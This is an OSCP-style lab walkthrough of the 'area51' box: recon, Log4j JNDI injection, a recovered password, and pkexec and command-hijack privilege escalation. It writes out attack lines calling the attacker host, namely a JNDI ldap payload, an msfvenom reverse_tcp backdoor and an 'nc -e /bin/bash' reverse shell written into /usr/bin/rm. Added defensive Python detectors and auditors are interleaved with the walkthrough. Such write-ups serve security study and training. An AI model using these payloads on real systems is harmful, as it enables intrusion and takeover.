OSCP practice box
Box overview
Box | Difficulty | Techniques
area51 | medium | Log4j2 exploitation, credential harvesting, pkexec privilege escalation, command hijacking, msf privilege escalation
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scanning
└─$ nmap -sV -A -p- -Pn -T4 192.168.1.97
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-25 10:36 +06
Nmap scan report for 192.168.1.97
Host is up (0.0034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
| 256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_ 256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: FBI Access
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds
Directory scanning
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.97 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.97
[+] Method: GET
[+] Threads: 10
[+] Wordlist: pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.97/.html (Status: 403) [Size: 277]
http://192.168.1.97/.php (Status: 403) [Size: 277]
http://192.168.1.97/video (Status: 301) [Size: 312] [--> http://192.168.1.97/video/]
http://192.168.1.97/index.html (Status: 200) [Size: 1131]
http://192.168.1.97/radar (Status: 301) [Size: 312] [--> http://192.168.1.97/radar/]
http://192.168.1.97/note.txt (Status: 200) [Size: 119]
http://192.168.1.97/moon (Status: 301) [Size: 311] [--> http://192.168.1.97/moon/]
http://192.168.1.97/.html (Status: 403) [Size: 277]
http://192.168.1.97/.php (Status: 403) [Size: 277]
http://192.168.1.97/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
The hint found here tells us to check for a Log4j vulnerability. A simple test with curl and nc (send a request carrying a JNDI lookup and watch for the callback on the listener) confirms that the vulnerability is present:
curl http://192.168.1.97:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.76:9001/test}'
nc -lvvp 9001
Alternatively, the following script can scan for it across the internal network:
https://github.com/Y0-kan/Log4jShell-Scan
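The defender's side of the check above, as an added example that is not part of the original post: the lookup string the curl command sends (`${jndi:ldap://...}`) is easy to match in web-server or proxy logs only when obfuscated forms such as nested `${lower:j}ndi` or `${::-j}${::-n}...` defaults are normalized first. The code below collapses those transforms and then reports the JNDI scheme and the header that carried it. The sample requests are constructed for this example; the header name and callback address mirror the page's command, and only the `lower`, `upper` and `:-` transforms are modelled.

```python
import re
from typing import Dict, List

# Constructed sample requests (not captured from the box): the first carries the
# exact header used on the page, the next two are obfuscated variants that evade a
# naive "${jndi:" string match, and the last is a benign request.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 192.168.1.97:8080\r\n"
    "X-Api-Version: ${jndi:ldap://192.168.1.76:9001/test}\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.1.97:8080\r\n"
    "X-Api-Version: ${${lower:j}ndi:${lower:l}dap://192.168.1.76:1389/a}\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.1.97:8080\r\n"
    "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:rmi://192.168.1.76:1099/x}\r\n",
    "GET /api HTTP/1.1\r\nHost: 192.168.1.97:8080\r\nX-Api-Version: 1.0.0\r\n",
]

# A lookup with no nested lookup inside it, e.g. ${lower:j} or ${::-j}.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The final form we want to catch: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _reduce(body: str):
    """Turn one innermost lookup body into plain text, or None if it is a real lookup.

    Only the transforms commonly abused for obfuscation are modelled here:
    ${lower:x}, ${upper:x} and the ${name:-default} fallback syntax.
    """
    if body.lower().startswith("jndi:"):
        return None  # leave the lookup we are hunting for intact
    if ":-" in body:
        return body.split(":-", 1)[1]  # undefined variable, so Log4j takes the default
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return None


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse innermost lookups until nothing simple is left to resolve."""
    while True:
        for m in INNERMOST.finditer(text):
            replacement = _reduce(m.group(1))
            if replacement is not None:
                text = text[: m.start()] + replacement + text[m.end():]
                break  # rescan from the start, the nesting depth changed
        else:
            return text


def find_jndi_lookups(value: str) -> List[Dict[str, str]]:
    """Return every JNDI lookup in a header value, with the protocol scheme it targets."""
    normalized = normalize_lookups(value)
    return [{"scheme": m.group(1).lower(), "match": m.group(0)}
            for m in JNDI.finditer(normalized)]


def scan_requests(requests: List[str]) -> List[Dict[str, str]]:
    """Walk raw HTTP requests header by header and report each JNDI lookup found."""
    hits: List[Dict[str, str]] = []
    for req in requests:
        for line in req.split("\r\n"):
            name, sep, value = line.partition(":")
            if not sep:
                continue  # request line or blank line
            for found in find_jndi_lookups(value):
                hits.append({"header": name.strip(), "scheme": found["scheme"],
                             "raw": value.strip()})
    return hits


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(f"JNDI lookup via {hit['scheme']} in header {hit['header']}: {hit['raw']}")
```

On the host side the matching indicator is the one the nc listener demonstrates: an application server opening outbound LDAP or RMI connections to an address it has no business talking to. Egress filtering from application servers and patching Log4j close the path regardless of how the lookup string is encoded.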
Gaining access
We first tried injecting with the JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar tool, but after a lot of fiddling it still failed.
Switching to a different exploit got a reverse shell; the script is as follows:
https://github.com/kozmer/log4j-shell-poc
curl 'http://192.168.1.97:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.1.76:1389/a}'
Running the following command shows that this is a Docker environment, so we also need to escape from the container:
ls -alh /.dockerenv
-rwxr-xr-x 1 root root 0 Dec 19 2021 /.dockerenv
Privilege escalation
php -S 0.0.0.0:123
Scanning with linpeas.sh reveals a hidden file; opening it gives the host machine's account password:
cat /var/tmp/.roger
b3st4l13n
After logging in we obtain the flag.
find / -perm -u=s -type f 2>/dev/null
roger@area51:~$ /usr/bin/pkexec --version
pkexec version 0.105
Use the msf privilege escalation module directly:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.76 LPORT=1234 -f elf > backdoor
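The SUID listing and the pkexec version check above are exactly what a host audit should automate. Below is an added example, not code from the original post: a Python version of `find / -perm -u=s -type f` that ranks each SUID file, flagging writable binaries first, then a SUID-root pkexec (whose known local privilege escalation is the page's route to root), then anything outside a baseline. The baseline set and the sample entries are constructed for the example; on a real host call `collect_suid_entries("/")` instead of the sample list.

```python
import os
import stat
from typing import Iterable, List, Tuple

# Paths that are normally SUID root on a stock Debian install. This baseline is
# constructed for the example; a real audit should derive it from package metadata
# or a golden image rather than from this list.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp",
}

Entry = Tuple[str, int, int]      # (path, st_mode, st_uid)
Finding = Tuple[str, str, str]    # (path, severity, reason)

PSEUDO_FS = {"/proc", "/sys", "/dev", "/run"}


def collect_suid_entries(root: str = "/") -> List[Entry]:
    """Equivalent of `find / -perm -u=s -type f`, returned as (path, mode, uid) tuples."""
    entries: List[Entry] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                entries.append((path, st.st_mode, st.st_uid))
    return entries


def classify_suid(entries: Iterable[Entry]) -> List[Finding]:
    """Rank SUID files: writable ones first, then pkexec, then anything off the baseline."""
    findings: List[Finding] = []
    for path, mode, uid in entries:
        if not mode & stat.S_ISUID:
            continue  # not SUID, nothing to rank
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((path, "critical", "SUID binary is group- or world-writable"))
        elif uid != 0:
            findings.append((path, "info", "SUID but not root-owned"))
        elif os.path.basename(path) == "pkexec":
            findings.append((path, "high",
                             "pkexec is SUID root; if polkit cannot be updated, drop the bit "
                             "with chmod 0755 to close the known local privilege escalation"))
        elif path not in EXPECTED_SUID:
            findings.append((path, "medium", "SUID root binary not in baseline"))
    return findings


# Constructed entries standing in for a scan of the box. Modes are st_mode values:
# 0o100000 (regular file) + 0o4000 (SUID) + permission bits.
SAMPLE_ENTRIES: List[Entry] = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/pkexec", 0o104755, 0),
    ("/opt/tool/backdoor", 0o104755, 0),
    ("/usr/local/bin/helper", 0o104777, 0),
    ("/usr/bin/normal", 0o100755, 0),
]

if __name__ == "__main__":
    for path, severity, reason in classify_suid(SAMPLE_ENTRIES):
        print(f"[{severity}] {path}: {reason}")
```

Run against the sample entries it reports the world-writable helper, the SUID pkexec and the unexpected binary under /opt, and stays silent on passwd and on the file that is not SUID at all.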
Privilege escalation, method two:
The linpeas.sh script finds a password in /etc/pam.d/kang; with that password we log in directly.
In kang's home directory there is a strange script that appears and disappears intermittently; running cat * shows that it also executes echo hi.
We guess that the script must run the rm command, so we try replacing that command with a reverse shell, and successfully obtain root:
echo 'nc -e /bin/bash 192.168.1.76 9001' > /usr/bin/rm
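The hijack above works because a privileged script calls rm by bare name and /usr/bin/rm could be overwritten by an unprivileged user. An audit for that condition, as an added example that is not part of the original post: it lists the commands a shell script resolves through PATH and checks whether the resolved binary, or the directory holding it, is writable by someone other than root. The script text and filesystem entries are constructed (SimpleNamespace objects stand in for os.stat results); called without the fakes, `audit_script` uses shutil.which and os.stat on the real system.

```python
import os
import re
import shlex
import shutil
import stat
from types import SimpleNamespace
from typing import Callable, List, Optional, Tuple

# Words that never resolve through PATH, so a bare mention is not a hijack risk.
SHELL_WORDS = {
    "echo", "cd", "export", "if", "then", "else", "elif", "fi", "for", "do", "done",
    "while", "until", "case", "esac", "exit", "return", "set", "unset", "local",
    "true", "false", "[", "test", "read", "source", ".", "shift", "eval", "exec",
}
SEPARATORS = re.compile(r"\|\||&&|[|;]")
ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def bare_commands(script_text: str) -> List[str]:
    """Commands a script invokes by bare name, in order; these resolve through PATH at run time."""
    found: List[str] = []
    for raw in script_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # crude comment strip, enough for cron-style scripts
        if not line:
            continue
        for segment in SEPARATORS.split(line):
            try:
                tokens = shlex.split(segment)
            except ValueError:
                continue  # unbalanced quotes, skip the segment
            while tokens and ASSIGNMENT.match(tokens[0]):
                tokens.pop(0)  # leading VAR=value prefixes
            if tokens and "/" not in tokens[0] and tokens[0] not in SHELL_WORDS:
                found.append(tokens[0])
    return found


def writable_by_non_owner(mode: int) -> bool:
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script(script_text: str, path_env: str,
                 resolve: Callable[..., Optional[str]] = shutil.which,
                 statfn: Callable[[str], object] = os.stat) -> List[Tuple[str, Optional[str], str]]:
    """For each bare command, resolve it through PATH and check whether a local user could replace it."""
    report: List[Tuple[str, Optional[str], str]] = []
    for cmd in sorted(set(bare_commands(script_text))):
        target = resolve(cmd, path=path_env)
        if target is None:
            report.append((cmd, None, "unresolved: a writable PATH entry could supply it"))
            continue
        st = statfn(target)
        dst = statfn(os.path.dirname(target))
        issues = []
        if st.st_uid != 0:
            issues.append("binary not owned by root")
        if writable_by_non_owner(st.st_mode):
            issues.append("binary is group- or world-writable")
        if writable_by_non_owner(dst.st_mode) and not dst.st_mode & stat.S_ISVTX:
            issues.append("containing directory is writable without the sticky bit")
        report.append((cmd, target, "; ".join(issues) or "ok"))
    return report


# --- constructed demo data, standing in for the box's script and filesystem ---
SAMPLE_SCRIPT = """#!/bin/bash
echo hi
rm -f /tmp/work/*
/usr/bin/touch /tmp/work/done
LOG=/tmp/work/log date | tee "$LOG"
"""

FAKE_FS = {
    "/usr/bin": SimpleNamespace(st_mode=0o40755, st_uid=0),
    "/usr/bin/rm": SimpleNamespace(st_mode=0o100777, st_uid=0),  # world-writable, modelled on the box
    "/usr/bin/date": SimpleNamespace(st_mode=0o100755, st_uid=0),
}


def fake_resolve(cmd: str, path: str = "") -> Optional[str]:
    candidate = "/usr/bin/" + cmd
    return candidate if candidate in FAKE_FS else None


def run_demo() -> List[Tuple[str, Optional[str], str]]:
    """Audit the constructed script against the constructed filesystem."""
    return audit_script(SAMPLE_SCRIPT, "/usr/bin", resolve=fake_resolve, statfn=FAKE_FS.__getitem__)


if __name__ == "__main__":
    for cmd, target, verdict in run_demo():
        print(f"{cmd:6} -> {target or '(not found)'}: {verdict}")
```

Two complementary fixes follow from the report: scripts that run as root should set PATH explicitly and call binaries by absolute path, and package-managed binaries such as /usr/bin/rm should be checked for tampering with the distribution's integrity tooling (`dpkg --verify` on Debian), since a rewritten rm is exactly what the page's last command produces.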
End
Originally published on the WeChat public account 贝雷帽SEC: [OSCP-Medium] area51
Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts none. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).